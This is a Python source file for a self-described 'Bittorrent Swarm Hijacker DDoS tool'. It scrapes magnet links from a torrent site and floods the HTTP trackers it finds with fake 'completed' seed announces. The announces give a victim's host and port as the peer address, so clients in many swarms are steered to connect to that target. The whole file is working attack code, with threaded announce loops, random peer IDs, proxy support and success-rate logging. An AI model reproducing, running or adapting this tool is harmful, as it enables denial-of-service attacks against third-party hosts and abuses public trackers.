    class locking_dict:
        def __init__(self):
            self.data = dict()
            self._alock = threading.Lock()
     
       
        def __setitem__(self,k,v):
            self._alock.acquire()
            r = self.data[k]=v
            self._alock.release()
     
     
           
        def __getitem__(self,k):
            self._alock.acquire()
            r = None
            try:
                r = self.data[k]
            except:
                pass
            self._alock.release()
            return r
     
     
        def __delitem__(self,k):
            self._alock.acquire()
            try:
                del self.data[k]
            except:
                pass
            self._alock.release()
     
     
        def __contains__(self,i):
     
            r = self.data.__contains__(i)
     
            return r
     
     
        def __len__(self):
     
            r = len(self.data)
     
            return r
     
        def __iter__(self):
     
            r = self.data.__iter__()
     
            return r
     
     
        def __index__(self,i):
            r = self.data.__index__(i)
            return r
     
     
        def keys(self):
            r = self.data.keys()
            return r
     
     
     
       
     
    def _announce(ctx):
        """
       announce to trackers many "fake" seeds for many different torrents
       """
        qs = {
               'port':ctx['port'],
               'uploaded' : 0,
               'downloaded' : 0,
               'left':0,
               'event':'completed',
               }
        try:
            for tracker in copy.copy(ctx['trackers'].data):
                if tracker in ctx['blacklist']:
                    continue
                for ih in copy.copy(ctx['trackers'][tracker]):
                    if ih in ctx['bad_ih']:
                        continue
                    def f():
                        ctx['tries'] += 1
                        qs['info_hash'] = ih
                        qs['peer_id'] = ctx['peer_id']()
                        qs['ip'] = socket.gethostbyname(ctx['host'])
                        resp = ctx['get_url']('%s?%s'%(tracker,urlencode(qs)))
                        if resp is None:
     
                            return
                        try:
                            resp = ctx['decode'](resp)
                        except:
                            return
                        if 'failure reason' in resp:
                            ctx['error']('Tracker Announce Failed: %s'%resp['failure reason'])
                            return
                        elif 'warning message' in resp:
                            ctx['error']('Tracker Warning: %s'%resp['warning message'])
                            return
                        ctx['success'] += 1
     
                    ctx['fork'](f)
                    ctx['sleep'](.5)
        except:
            pass
     
     
     
     
    def _stats_loop(ctx):
        while ctx['on']:
            s = ctx['success']
            f = ctx['fails']
            a = ctx['tries']
            if f+s > 0:
                ctx['log']('%d / %d / %d  (%f %% success)'%(s,f,a,100*(float(s)/float(f+s))))
            ctx['sleep'](10)
           
     
     
    def _mainloop(ctx):
        """
       Mainloop
       """
        ctx['fork'](ctx['finder_loop'])
        ctx['fork'](ctx['stats_loop'])
        while ctx['on']:
            ctx['fork'](lambda : ctx['inject']())
            ctx['sleep'](60)
     
     
     
    def _log(ctx,m):
        ctx['log_lock'].acquire()
        m = str(m)
        for p in m.split('\n'):
            print ('[+] %s'%p.strip())
        ctx['log_lock'].release()
     
    def _error(ctx,m):
        ctx['log_lock'].acquire()
        m = str(m)
        for p in m.split('\n'):
            print ('[-] %s'%p.strip())
        ctx['log_lock'].release()
     
    def _fork(func):
        try:
            threading.Thread(target=func,args=()).start()
        except:
            ctx['print_error']()
     
     
    def _find_torrents(ctx,page_data):
        """
       given html, find all magnet links with at least 1 http based tracker announce url
       add new entries found to list to announce with
       """
     
        if page_data is None:
            ctx['error']('No Data given to torrent finder')
     
            return
        bs = BS(page_data)
        if bs is None:
            ctx['error']('Failed to Parse page data of length %d'%len(page_data))
     
            return
        for link in bs.find_all('a'):
            text = link.get('href')
            if text is None or len(text) == 0:
                continue
            if text.startswith('magnet:?xt=urn:btih:'):
                data = text.split(':')[3]
                for tracker in data.split('&')[2:]:
                    tracker = unquote(tracker.split('=')[1])
                    if not tracker.startswith('http://'):
                        continue
                    if tracker not in ctx['trackers']:
                        ctx['trackers'][tracker] = dict()
                    infohash = ctx['infohash_to_bytes'](data.split('&')[0])
                    if infohash not in ctx['trackers'][tracker]:
                        ctx['trackers'][tracker][infohash] = ''
     
     
    def _get_url(ctx,url):
        """
       Do an HTTP GET request with given a url
       """
        try:
            if not url.startswith('http://'):
                ctx['error']('%s is not an http url'%url)
                return
            if 'proxies' in ctx:
                resp = requests.get(url,proxies=ctx['proxies'],headers={'User-Agent':''})
            else:
                resp = requests.get(url,headers={'User-Agent':''})
            if resp is not None and resp.text is not None and resp.status_code == 200:
                return resp.text
            elif resp is not None and resp.status_code != 200:
                if not resp.status_code >= 500:
                    ctx['error']('HTTP %s'%resp.status_code)
        except:
            pass
        ctx['fails'] += 1
           
     
       
    def _finder_loop(ctx):
        while ctx['on']:
            ctx['scrape_torrents']()
            ctx['sleep'](3000)
     
    def _infohash_to_bytes(ih):
        ret = ''
        for n in range(len(ih)/2):
            ret+=binascii.a2b_hex(b'%s'%ih[n*2:(n*2)+2])
        return ret
     
    def _do_find_torrents(ctx):
        ctx['log']('Updating Torrent DB')
        ctx['blacklist'] = locking_dict()
        ctx['bad_ih'] = locking_dict()
        for url in ctx['urls']:
            ctx['fork'](lambda : ctx['find_torrents'](url))
            ctx['sleep'](1)
       
     
     
     
    def _rand(l,chars='1234567890'):
        ret = ''
        for n in range(l):
            ret += chars[random.randint(0,len(chars)-1)]
        return ret
     
    def init(ctx):
        ctx['on'] = True
        ctx['log'] = lambda m:  _log(ctx,m)
        ctx['error'] = lambda m: _error(ctx,m)
        ctx['log_lock'] =  threading.Lock()
        ctx['blacklist'] = locking_dict()
        ctx['trackers'] = locking_dict()
        ctx['bad_ih'] = locking_dict()
        ctx['success'] = 0
        ctx['tries'] = 0
        ctx['decode'] = hunnyb.decode
        ctx['finder_loop'] = lambda : _finder_loop(ctx)
        ctx['stats_loop'] = lambda : _stats_loop(ctx)
        ctx['infohash_to_bytes'] = _infohash_to_bytes
        ctx['peer_id'] = lambda : '-TR2720-%s'%_rand(12)
        ctx['inject'] = lambda : _announce(ctx)
        ctx['mainloop'] = lambda : _mainloop(ctx)
        ctx['get_url'] = lambda url : _get_url(ctx,url)
        ctx['scrape_torrents'] = lambda : _do_find_torrents(ctx)
        ctx['find_torrents'] = lambda url : _find_torrents(ctx,ctx['get_url'](url))
        ctx['print_error'] = lambda : ctx['error']('ERROR: %s'%traceback.format_exc())
        ctx['fork'] = _fork
        ctx['fails'] = 0
        ctx['sleep'] = time.sleep
        if 'proxies' in ctx:
            ctx['log']('Using Proxy: %s'%ctx['proxies']['http'])
        else:
            ctx['log']('!!! Using No Proxy !!!')
     
     
    if __name__ == '__main__':
        import argparse, sys, os
        p = argparse.ArgumentParser(description='Bittorrent Swarm Hijacker DDoS tool thingy')
        p.add_argument('--proxy',help='http proxy to use')
        p.add_argument('host',help='hostname or ip address of the target to attack')
        p.add_argument('port',help='tcp port to attack the target on')
        args = p.parse_args()
        if not hasattr(args,'host') or not hasattr(args,'port'):
            p.print_usage()
            sys.exit(0)
        urls = []
        for url in ['http://kat.ph/movies/','http://kat.ph/music/','http://kat.ph/anime/','http://kat.ph/books/' ]:
            for n in range(3):
                urls.append('%s%d/'%(url,n+1))
       
       
        ctx = {
            'host':args.host,
            'port':args.port,
            'urls':urls
            }
        if args.proxy is not None:
            ctx['proxies'] = {'http':args.proxy}
        init(ctx)
        try:
            ctx['mainloop']()
        except KeyboardInterrupt:
            ctx['log']('Interrupted')
            os.abort()
        except:
            ctx['print_error']()